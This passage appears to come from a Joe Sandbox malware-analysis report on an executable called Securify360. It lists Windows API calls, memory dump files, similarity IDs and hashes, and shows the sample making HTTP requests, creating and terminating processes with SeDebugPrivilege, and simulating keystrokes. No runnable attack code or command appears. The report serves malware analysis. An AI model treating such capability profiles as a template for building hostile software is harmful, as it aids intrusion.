                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                              • API String ID: 1924731296-2107944366
                                                                                              • Opcode ID: dda45945729e24539a47ed944dbef7cb438ddf81fd6b044bc72448240d8e2f9e
                                                                                              • Instruction ID: 91eb6ae9cd9ada08d3c424fb15db133d5999bd700eabeef5960ece8203ade3fb
                                                                                              • Opcode Fuzzy Hash: dda45945729e24539a47ed944dbef7cb438ddf81fd6b044bc72448240d8e2f9e
                                                                                              • Instruction Fuzzy Hash: 0151BA70244305AFEB20EF24CC95FAB7BE1FB88310F10891DF995872A5CB79A945DB52
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0100211C
                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01002148
                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0100218A
                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0100219F
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010021AC
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 010021DC
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 01002223
                                                                                                • Part of subcall function 01002B4F: GetLastError.KERNEL32(?,?,01001EE3,00000000,00000000,00000001), ref: 01002B64
                                                                                                • Part of subcall function 01002B4F: SetEvent.KERNEL32(?,?,01001EE3,00000000,00000000,00000001), ref: 01002B79
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                              • String ID:
                                                                                              • API String ID: 2603140658-3916222277
                                                                                              • Opcode ID: 4d689dcc3ff4011c39ad0d00fd8cab03f0603be15120cd2d0600a35ae5c713be
                                                                                              • Instruction ID: 2ad682dda029104987d03dcd6a2009098d46605eb1f20641541bda516a8810c5
                                                                                              • Opcode Fuzzy Hash: 4d689dcc3ff4011c39ad0d00fd8cab03f0603be15120cd2d0600a35ae5c713be
                                                                                              • Instruction Fuzzy Hash: 1C418CB1900208BFFB229F54CC89FFB7BACFB08354F104156FA849A185D7759A448BA0
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,01020980), ref: 01009412
                                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,01020980), ref: 01009446
                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 010095C0
                                                                                              • SysFreeString.OLEAUT32(?), ref: 010095EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                              • String ID:
                                                                                              • API String ID: 560350794-0
                                                                                              • Opcode ID: 19bb5ec872fdf146799217038bd11c77c480a7a3dc21d210663f8efe7d4f80ba
                                                                                              • Instruction ID: 04e24e070facd273182f1021b55774e041fb68bd4f904ce3265721b87c075750
                                                                                              • Opcode Fuzzy Hash: 19bb5ec872fdf146799217038bd11c77c480a7a3dc21d210663f8efe7d4f80ba
                                                                                              • Instruction Fuzzy Hash: A1F14F71A00209EFEF55DF94C884EAEB7B5FF45319F108098F559AB292CB31AE45CB50
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 0100FD9E
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0100FF31
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0100FF55
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0100FF95
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0100FFB7
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01010133
                                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 01010165
                                                                                              • CloseHandle.KERNEL32(?), ref: 01010194
                                                                                              • CloseHandle.KERNEL32(?), ref: 0101020B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4090791747-0
                                                                                              • Opcode ID: 19030fa67826771b04f76330db2ee010b767a8a81bdfb55db17df9e8198ee800
                                                                                              • Instruction ID: 7df3ead8857a0760b2eeb79e4d2a75421849021ac233b9ec62647d575aa106da
                                                                                              • Opcode Fuzzy Hash: 19030fa67826771b04f76330db2ee010b767a8a81bdfb55db17df9e8198ee800
                                                                                              • Instruction Fuzzy Hash: AEE1D1312043419FEB25EF24C891A6EBBE1AF85314F14845DF9C98B2A6CB39EC41DB52
                                                                                              APIs
                                                                                                • Part of subcall function 00FF4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FF3B8A,?), ref: 00FF4BE0
                                                                                                • Part of subcall function 00FF4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FF3B8A,?), ref: 00FF4BF9
                                                                                                • Part of subcall function 00FF4FEC: GetFileAttributesW.KERNEL32(?,00FF3BFE), ref: 00FF4FED
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00FF52FB
                                                                                              • _wcscmp.LIBCMT ref: 00FF5315
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00FF5330
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 793581249-0
                                                                                              • Opcode ID: 0a450a90ee062b7e8b81f326f0dd2b9f02617faedb882e97318efe423d3b5a6e
                                                                                              • Instruction ID: 369932c0ca43bf47e7059856791051f5456fddb536be7bc78d0d84afd5ddc04b
                                                                                              • Opcode Fuzzy Hash: 0a450a90ee062b7e8b81f326f0dd2b9f02617faedb882e97318efe423d3b5a6e
                                                                                              • Instruction Fuzzy Hash: 745187B24083499BC764EB94DC819EFB3DCAF85710F50491EF789C3152EF38A6889756
                                                                                              APIs
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 01018D24
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: InvalidateRect
                                                                                              • String ID:
                                                                                              • API String ID: 634782764-0
                                                                                              • Opcode ID: 528bdb00f2c5c6b40965c95f09d39ff16d69c116eb9688effd4ee2f6f8080f2b
                                                                                              • Instruction ID: 1d04b0d1a8cf82856f7b9bcf556e50912a08126b32b99c39ac6e30bf161d72e7
                                                                                              • Opcode Fuzzy Hash: 528bdb00f2c5c6b40965c95f09d39ff16d69c116eb9688effd4ee2f6f8080f2b
                                                                                              • Instruction Fuzzy Hash: DF51B430641308BFEFB0AE28CC89B9D7FA5BB05310F648553F695E7199C77AAA40CB50
                                                                                              APIs
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FCC638
                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FCC65A
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FCC672
                                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FCC690
                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FCC6B1
                                                                                              • DestroyIcon.USER32(00000000), ref: 00FCC6C0
                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FCC6DD
                                                                                              • DestroyIcon.USER32(?), ref: 00FCC6EC
                                                                                                • Part of subcall function 0101AAD4: DeleteObject.GDI32(00000000), ref: 0101AB0D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                              • String ID:
                                                                                              • API String ID: 2819616528-0
                                                                                              • Opcode ID: ae89cb474dec987caa68335180cb3b1d60447404003365a47334a2579755e1d3
                                                                                              • Instruction ID: 4a06f3bd28447839ab74de4460344b2a1013eca76e5cd84b87bf31e44af7a942
                                                                                              • Opcode Fuzzy Hash: ae89cb474dec987caa68335180cb3b1d60447404003365a47334a2579755e1d3
                                                                                              • Instruction Fuzzy Hash: CC516A71A0020AAFEF60DF24DD45FAA77B5FB48724F204518F94A97290DB75AC80FB90
                                                                                              APIs
                                                                                                • Part of subcall function 00FEB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FEB54D
                                                                                                • Part of subcall function 00FEB52D: GetCurrentThreadId.KERNEL32 ref: 00FEB554
                                                                                                • Part of subcall function 00FEB52D: AttachThreadInput.USER32(00000000,?,00FEA23B,?,00000001), ref: 00FEB55B
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FEA246
                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FEA263
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00FEA266
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FEA26F
                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FEA28D
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FEA290
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FEA299
                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FEA2B0
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FEA2B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2014098862-0
                                                                                              • Opcode ID: 1949cee7b3e86ab5c4f87deab15b90768f06c9cbc9de448bf7348e8483e05dbf
                                                                                              • Instruction ID: 1907b12be1e600df7c6daf61b10417327a2896a4f361174976e8adec3a7a653f
                                                                                              • Opcode Fuzzy Hash: 1949cee7b3e86ab5c4f87deab15b90768f06c9cbc9de448bf7348e8483e05dbf
                                                                                              • Instruction Fuzzy Hash: 2311C271550218BEF6306F619C49F6A7A2DDB4C750F300415F3806B098CAF75C509BA0
                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FE915A,00000B00,?,?), ref: 00FE94E2
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00FE915A,00000B00,?,?), ref: 00FE94E9
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FE915A,00000B00,?,?), ref: 00FE94FE
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00FE915A,00000B00,?,?), ref: 00FE9506
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00FE915A,00000B00,?,?), ref: 00FE9509
                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FE915A,00000B00,?,?), ref: 00FE9519
                                                                                              • GetCurrentProcess.KERNEL32(00FE915A,00000000,?,00FE915A,00000B00,?,?), ref: 00FE9521
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00FE915A,00000B00,?,?), ref: 00FE9524
                                                                                              • CreateThread.KERNEL32(00000000,00000000,00FE954A,00000000,00000000,00000000), ref: 00FE953E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 1957940570-0
                                                                                              • Opcode ID: 907556295e0755dfaf4d641b40afe7146d22c12bdc443061300261f920a0e112
                                                                                              • Instruction ID: 21fa856856ed2d4b8320e5cae464da5d8b280fb35417a6d8d3aaac583f2ce867
                                                                                              • Opcode Fuzzy Hash: 907556295e0755dfaf4d641b40afe7146d22c12bdc443061300261f920a0e112
                                                                                              • Instruction Fuzzy Hash: C401BBB5640344BFE730AFA5DC4EF6B7BACEB89711F604411FA45DB199CA769804CB20
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                              • API String ID: 0-572801152
                                                                                              • Opcode ID: a7cd6a4daf3619453b15925a7b5191da485bf0a12f311c05868b216262b4d9e7
                                                                                              • Instruction ID: 5d614f306ff58272c29e54a4f7da8d85c7902a25dbd729913f4f996560ac1e17
                                                                                              • Opcode Fuzzy Hash: a7cd6a4daf3619453b15925a7b5191da485bf0a12f311c05868b216262b4d9e7
                                                                                              • Instruction Fuzzy Hash: D5C1A171B0031ADFEF11DF98C884AAEB7F5BB48310F148469FA85AB281E7759945CB90
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$_memset
                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                              • API String ID: 2862541840-625585964
                                                                                              • Opcode ID: 1cc136fea2a812c7fca78d600fed48c6d8fb1685e5d27ce2f71cf76c2cf1a964
                                                                                              • Instruction ID: 3d9f04daad66139b30d98973fb82cb1a7334d0061ddc5b9e86c3e716845b0192
                                                                                              • Opcode Fuzzy Hash: 1cc136fea2a812c7fca78d600fed48c6d8fb1685e5d27ce2f71cf76c2cf1a964
                                                                                              • Instruction Fuzzy Hash: 0991B470A00219AFEF25CFA9CC44FAEBBB8EF45714F008559F559AB282D7709945CFA0
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01017449
                                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 0101745D
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01017477
                                                                                              • _wcscat.LIBCMT ref: 010174D2
                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 010174E9
                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01017517
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window_wcscat
                                                                                              • String ID: SysListView32
                                                                                              • API String ID: 307300125-78025650
                                                                                              • Opcode ID: 3f09112637efa365315e97f3700be7aecc44d716e9707e2de94544e26b057084
                                                                                              • Instruction ID: 06b4212c9ff45349d73fdda65d329bfcc99b76d741188bb2c9ea4411d912c8e5
                                                                                              • Opcode Fuzzy Hash: 3f09112637efa365315e97f3700be7aecc44d716e9707e2de94544e26b057084
                                                                                              • Instruction Fuzzy Hash: C741A471A40348AFEB219F68CC85BEE7BE8EF08350F10446AFAC5A7195D7759984CB50
                                                                                              APIs
                                                                                                • Part of subcall function 00FF4148: CreateToolhelp32Snapshot.KERNEL32 ref: 00FF416D
                                                                                                • Part of subcall function 00FF4148: Process32FirstW.KERNEL32(00000000,?), ref: 00FF417B
                                                                                                • Part of subcall function 00FF4148: CloseHandle.KERNELBASE(00000000), ref: 00FF4245
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0100F08D
                                                                                              • GetLastError.KERNEL32 ref: 0100F0A0
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0100F0CF
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0100F14C
                                                                                              • GetLastError.KERNEL32(00000000), ref: 0100F157
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0100F18C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                              • String ID: SeDebugPrivilege
                                                                                              • API String ID: 2533919879-2896544425
                                                                                              • Opcode ID: 6ef61cd7f5566aa2ffd85c72d3284828baf0adbbcc4643873b0fb8eaf01c8e58
                                                                                              • Instruction ID: 0a0a4decde7842b505784c43213c1c5e4c54be7643f2b4f9f65a7e1677b135b5
                                                                                              • Opcode Fuzzy Hash: 6ef61cd7f5566aa2ffd85c72d3284828baf0adbbcc4643873b0fb8eaf01c8e58
                                                                                              • Instruction Fuzzy Hash: B341E4302003019FEB32EF24CC95F6EB7A5AF85714F148049F9824F2C2CB79A805EB95
                                                                                              APIs
                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 00FF357C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoad
                                                                                              • String ID: blank$info$question$stop$warning
                                                                                              • API String ID: 2457776203-404129466
                                                                                              • Opcode ID: a82a71758dcf58f44d76f4a1a15c7ae3e3844117f72f517c2b78aad44ebc542f
                                                                                              • Instruction ID: 1bcf322db51d45e8cd9c3908dc86731e5ac63801878eb3a67999975b2a8434ca
                                                                                              • Opcode Fuzzy Hash: a82a71758dcf58f44d76f4a1a15c7ae3e3844117f72f517c2b78aad44ebc542f
                                                                                              • Instruction Fuzzy Hash: 9311EB72A4834BBEAB105A19DCC2DBA779CDF45370B28006EFB0066151E769AF4466A0
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FF4802
                                                                                              • LoadStringW.USER32(00000000), ref: 00FF4809
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FF481F
                                                                                              • LoadStringW.USER32(00000000), ref: 00FF4826
                                                                                              • _wprintf.LIBCMT ref: 00FF484C
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FF486A
                                                                                              Strings
                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00FF4847
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
